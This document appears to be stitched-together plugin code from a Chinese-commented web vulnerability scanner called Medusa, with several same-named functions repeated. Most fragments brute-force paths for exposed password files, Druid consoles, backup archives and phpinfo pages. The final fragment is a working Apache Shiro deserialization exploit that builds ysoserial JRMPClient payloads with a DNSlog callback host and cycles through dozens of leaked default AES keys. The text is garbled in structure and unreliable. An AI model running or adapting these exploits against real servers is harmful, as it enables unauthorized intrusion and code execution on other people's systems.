def SubdomainWorkbench(Url): #子域名搜索调用函数
SubdomainList = [] #全局子域名列表
SubdomainThreadPool = ThreadPool() #定义一个子域名搜索线程池
SubdomainThreadPool.Append(
xxxx, Url=Url, SubdomainList=SubdomainList) #传入全局的子域名列表,这样就能获取到结果了
SubdomainThreadPool.Start(5) #默认5个,后面使用配置文件
def medusa(**kwargs)->None:
Url = kwargs.get("Url") # 获取传入的url参数
Headers = kwargs.get("Headers") # 获取传入的头文件
proxies = kwargs.get("Proxies") # 获取传入的代理参数
payloads = ["/root.txt",
"/db.txt",
"/password.txt",
"/username.txt",
"/database.txt",
"/1.txt",
"/123.txt",
"/a.txt",
]
Pool=ThreadPool()
Headers["Accept-Language"] = "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2"
Headers["Accept-Encoding"] = "gzip, deflate"
try:
for payload in payloads:
payload_url = Url+payload
Pool.Append(task,Url=Url,headers=Headers,proxies=proxies,payload_url=payload_url,Uid=kwargs.get("Uid"),Sid=kwargs.get("Sid"))
Pool.Start(thread_number) # 启动线程池
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorLog().Write("Plugin Name:" + _ + " ThreadPool ", e) # 调用写入类传入URL和错误插件名
def medusa(**kwargs) -> None:
Url = kwargs.get("Url") # 获取传入的url参数
Headers = kwargs.get("Headers") # 获取传入的头文件
proxies = kwargs.get("Proxies") # 获取传入的代理参数
list = [
'/index.html', '/datasource.html', '/sql.html', '/wall.html',
'/webapp.html', '/weburi.html', '/websession.html', '/spring.html'
]
Headers[
"Accept-Language"] = "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2"
Headers["Accept-Encoding"] = "gzip, deflate"
Pool = ThreadPool()
try:
for payload in list:
payload_url = Url + '/druid' + payload
Pool.Append(task,
Url=Url,
headers=Headers,
proxies=proxies,
payload_url=payload_url,
Uid=kwargs.get("Uid"),
Sid=kwargs.get("Sid"))
Pool.Start(thread_number) # 启动线程池
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorLog().Write("Plugin Name:" + _ + " ThreadPool ",
e) # 调用写入类传入URL和错误插件名
def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None:
proxies = Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
suffixs = [
".zip", ".rar", ".tar.gz", ".tgz", ".7z", ".wim", ".lzh", ".cab",
".arj", ".lz4", ".db", ".gz", ".bz2 ", ".tar.bz2", ".xz ", ".tar.xz",
".z ", ".tar.z", ".zipx"
]
payloads = [
"/www.root",
"/bbs",
"/www",
"/wwwroot",
"/web",
"/root",
"/database",
"/db",
"/website",
"/config_ucenter.php",
"/config_global.php",
"/1",
"/123",
"/a",
"/新建文件夹",
]
Headers[
"Accept-Language"] = "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2"
Headers["Accept-Encoding"] = "gzip, deflate"
Pool = ThreadPool()
try:
for suffix in suffixs: #域名加上后缀
payload_url = Url + "/" + url + suffix
file_name = url + suffix
Pool.Append(task,
url=url,
file_name=file_name,
headers=Headers,
proxies=proxies,
payload_url=payload_url,
Uid=kwargs.get("Uid"),
Sid=kwargs.get("Sid"))
for payload in payloads:
for suffix in suffixs:
payload_url = Url + payload + suffix
file_name = payload + suffix
Pool.Append(task,
url=url,
file_name=file_name,
headers=Headers,
proxies=proxies,
payload_url=payload_url,
Uid=kwargs.get("Uid"),
Sid=kwargs.get("Sid"))
Pool.Start(thread_number) # 启动线程池
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorLog().Write("Plugin Name:" + _ + " ThreadPool ",
e) # 调用写入类传入URL和错误插件名
def MedusaScan(WebScanUrl, WebScanUserToken, WebScanModule, WebScanThreads,
WebScanAgentHeader):
WebScanThreadPool = ThreadPool() #定义一个线程池
if WebScanAgentHeader == "false":
Values = AgentHeader().result("None")
else:
Values = AgentHeader().result(WebScanAgentHeader)
if WebScan(WebScanThreadPool, WebScanUrl, Values, WebScanUserToken,
WebScanModule):
WebScanThreadPool.Start(WebScanThreads) # 启动多线程
def MedusaScan(Url,Module,ScanThreads,Values,proxies,**kwargs):
ScanThreadPool =ThreadPool()#定义一个线程池
if Module=="all":
for MedusaVulnerability in MedusaVulnerabilityList:
MedusaVulnerabilityList[MedusaVulnerability](ScanThreadPool, Url, Values, proxies,**kwargs)#调用列表里面的值
else:
try:
MedusaVulnerabilityList[Module](ScanThreadPool, Url, Values, proxies,**kwargs) # 调用列表里面的值
except:#如果传入非法字符串会调用出错
pass
ScanThreadPool.Start(ScanThreads)
def MedusaScan(Url, Token, Module, WebScanThreads, Values):
WebScanThreadPool = ThreadPool() #定义一个线程池
if Module == "all":
for MedusaVulnerability in MedusaVulnerabilityList:
MedusaVulnerabilityList[MedusaVulnerability](WebScanThreadPool,
Url, Values,
Token) #调用列表里面的值
WebScanThreadPool.Start(WebScanThreads)
else:
try:
MedusaVulnerabilityList[Module](WebScanThreadPool, Url, Values,
Token) # 调用列表里面的值
WebScanThreadPool.Start(WebScanThreads)
except: #如果传入非法字符串会调用出错
pass
def medusa(Url:str,RandomAgent:str,proxies:str=None,**kwargs)->None:
proxies=Proxies().result(proxies)
list = ['/index.html', '/datasource.html', '/sql.html', '/wall.html', '/webapp.html', '/weburi.html',
'/websession.html', '/spring.html']
headers = {
'User-Agent': RandomAgent,
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
}
Pool=ThreadPool()
try:
for payload in list:
payload_url = Url + '/druid' + payload
Pool.Append(task,Url=Url,headers=headers,proxies=proxies,payload_url=payload_url,Uid=kwargs.get("Uid"),Sid=kwargs.get("Sid"))
Pool.Start(thread_number) # 启动线程池
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorLog().Write("Plugin Name:"+_+" ThreadPool ",e) # 调用写入类传入URL和错误插件名
def medusa(**kwargs) -> None:
url = kwargs.get("Url") # 获取传入的url参数
Headers = kwargs.get("Headers") # 获取传入的头文件
proxies = kwargs.get("Proxies") # 获取传入的代理参数
list = [
'/index.php', '/1.php', '/2.php', '/3.php', '/4.php', '/5.php',
'/6.php', '/7.php', '/8.php', '/9.php', '/10.php', '/11.php',
'/12.php', '/13.php', '/123.php', '/1234.php', '/12345.php',
'/123456.php', '/a.php', '/b.php', '/c.php', '/d.php', '/e.php',
'/f.php', '/g.php', '/h.php', '/i.php', '/j.php', '/k.php', '/l.php',
'/m.php', '/n.php', '/o.php', '/p.php', '/q.php', '/r.php', '/s.php',
'/t.php', '/u.php', '/v.php', '/w.php', '/x.php', '/y.php', '/z.php',
'/php.php', '/abc.php', '/test.php', '/test1.php', '/test2.php',
'/test3.php', '/test123.php', '/info.php', '/phpinfo.php',
'/iProber.php', '/iProber1.php', '/iProber2.php', '/iProber3.php',
'/test_phpinfo.php', '/tools/info.php', '/ship/phpinfo.php',
'/web/info.php', '/web/phpinfo.php', '/xampp/info.php',
'/xampp/phpinfo.php', '/index.php?act=phpinfo',
'/dashboard/phpinfo.php'
]
Pool = ThreadPool()
Headers[
"Accept-Language"] = "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2"
Headers["Accept-Encoding"] = "gzip, deflate"
try:
for payload in list:
payload_url = url + payload
Pool.Append(task,
Url=url,
headers=Headers,
proxies=proxies,
payload_url=payload_url,
Uid=kwargs.get("Uid"),
Sid=kwargs.get("Sid"))
Pool.Start(thread_number) # 启动线程池
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorLog().Write("Plugin Name:" + _ + " ThreadPool ",
e) # 调用写入类传入URL和错误插件名
def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None:
proxies = Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
ExpClass = "JRMPClient"
CipherKey = [
"kPH+bIxk5D2deZiIxcaaaA==",
"2AvVhdsgUs0FSA3SDFAdag==",
"3AvVhmFLUs0KTA3Kprsdag==",
"4AvVhmFLUs0KTA3Kprsdag==",
"5AvVhmFLUs0KTA3Kprsdag==",
"5aaC5qKm5oqA5pyvAAAAAA==",
"6ZmI6I2j5Y+R5aSn5ZOlAA==",
"bWljcm9zAAAAAAAAAAAAAA==",
"wGiHplamyXlVB11UXWol8g==",
"Z3VucwAAAAAAAAAAAAAAAA==",
"MTIzNDU2Nzg5MGFiY2RlZg==",
"U3ByaW5nQmxhZGUAAAAAAA==",
"fCq+/xW488hMTCD+cmJ3aQ==",
"1QWLxg+NYmxraMoxAXu/Iw==",
"ZUdsaGJuSmxibVI2ZHc9PQ==",
"L7RioUULEFhRyxM7a2R/Yg==",
"r0e3c16IdVkouZgk1TKVMg==",
"bWluZS1hc3NldC1rZXk6QQ==",
"a2VlcE9uR29pbmdBbmRGaQ==",
"WcfHGU25gNnTxTlmJMeSpw==",
"OY//C4rhfwNxCQAQCrQQ1Q==",
"5J7bIJIV0LQSN3c9LPitBQ==",
"f/SY5TIve5WWzT4aQlABJA==",
"bya2HkYo57u6fWh5theAWw==",
"WuB+y2gcHRnY2Lg9+Aqmqg==",
"kPv59vyqzj00x11LXJZTjJ2UHW48jzHN",
"3qDVdLawoIr1xFd6ietnwg==",
"ZWvohmPdUsAWT3=KpPqda",
"YI1+nBV//m7ELrIyDHm6DQ==",
"6Zm+6I2j5Y+R5aS+5ZOlAA==",
"2A2V+RFLUs+eTA3Kpr+dag==",
"6ZmI6I2j3Y+R1aSn5BOlAA==",
"SkZpbmFsQmxhZGUAAAAAAA==",
"2cVtiE83c4lIrELJwKGJUw==",
"fsHspZw/92PrS3XrPW+vxw==",
"XTx6CKLo/SdSgub+OPHSrw==",
"sHdIjUN6tzhl8xZMG3ULCQ==",
"O4pdf+7e+mZe8NyxMTPJmQ==",
"HWrBltGvEZc14h9VpMvZWw==",
"rPNqM6uKFCyaL10AK51UkQ==",
"Y1JxNSPXVwMkyvES/kJGeQ==",
"lT2UvDUmQwewm6mMoiw4Ig==",
"MPdCMZ9urzEA50JDlDYYDg==",
"xVmmoltfpb8tTceuT5R7Bw==",
"c+3hFGPjbgzGdrC+MHgoRQ==",
"ClLk69oNcA3m+s0jIMIkpg==",
"Bf7MfkNR0axGGptozrebag==",
"1tC/xrDYs8ey+sa3emtiYw==",
"ZmFsYWRvLnh5ei5zaGlybw==",
"cGhyYWNrY3RmREUhfiMkZA==",
"IduElDUpDDXE677ZkhhKnQ==",
"yeAAo1E8BOeAYfBlm4NG9Q==",
"cGljYXMAAAAAAAAAAAAAAA==",
"2itfW92XazYRi5ltW0M2yA==",
"XgGkgqGqYrix9lI6vxcrRw==",
"ertVhmFLUs0KTA3Kprsdag==",
"5AvVhmFLUS0ATA4Kprsdag==",
"s0KTA3mFLUprK4AvVhsdag==",
"hBlzKg78ajaZuTE0VLzDDg==",
"9FvVhtFLUs0KnA3Kprsdyg==",
"d2ViUmVtZW1iZXJNZUtleQ==",
"yNeUgSzL/CfiWw1GALg6Ag==",
"NGk/3cQ6F5/UNPRh8LpMIg==",
"4BvVhmFLUs0KTA3Kprsdag==",
"MzVeSkYyWTI2OFVLZjRzZg==",
"CrownKey==a12d/dakdad",
"empodDEyMwAAAAAAAAAAAA==",
"A7UzJgh1+EWj5oBFi+mSgw==",
"YTM0NZomIzI2OTsmIzM0NTueYQ==",
"c2hpcm9fYmF0aXMzMgAAAA==",
"i45FVt72K2kLgvFrJtoZRw==",
"U3BAbW5nQmxhZGUAAAAAAA==",
"ZnJlc2h6Y24xMjM0NTY3OA==",
"Jt3C93kMR9D5e8QzwfsiMw==",
"MTIzNDU2NzgxMjM0NTY3OA==",
"vXP33AonIp9bFwGl7aT7rA==",
"V2hhdCBUaGUgSGVsbAAAAA==",
"Z3h6eWd4enklMjElMjElMjE=",
"Q01TX0JGTFlLRVlfMjAxOQ==",
"ZAvph3dsQs0FSL3SDFAdag==",
"Is9zJ3pzNh2cgTHB4ua3+Q==",
"NsZXjXVklWPZwOfkvk6kUA==",
"GAevYnznvgNCURavBhCr1w==",
"66v1O8keKNV3TTcGPK1wzg==",
"SDKOLKn2J1j/2BHjeZwAoQ==",
]
BLOCK_SIZE = AES.block_size
PAD_FUNC = lambda s: s + ((BLOCK_SIZE - len(s) % BLOCK_SIZE) * chr(
BLOCK_SIZE - len(s) % BLOCK_SIZE)).encode()
AES_MODE = AES.MODE_CBC
AES_IV = uuid.uuid4().bytes
payload_url = scheme + "://" + url + ":" + str(port)
YsoserialPath = GetToolFilePath().Result() + "ysoserial.jar"
Pool = ThreadPool()
try:
for key in CipherKey:
DL = Dnslog()
popen = subprocess.Popen(
["java", "-jar", YsoserialPath, ExpClass,
DL.dns_host()],
stdout=subprocess.PIPE)
file_body = PAD_FUNC((popen).stdout.read())
Pool.Append(task,
Pool=Pool,
url=url,
file_body=file_body,
key=key,
AES_MODE=AES_MODE,
AES_IV=AES_IV,
payload_url=payload_url,
DL=DL,
proxies=proxies,
Uid=kwargs.get("Uid"),
Sid=kwargs.get("Sid"))
Pool.Start(20) #启动线程池
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorLog().Write("Plugin Name:" + _ + " ThreadPool ",
e) # 调用写入类传入URL和错误插件名
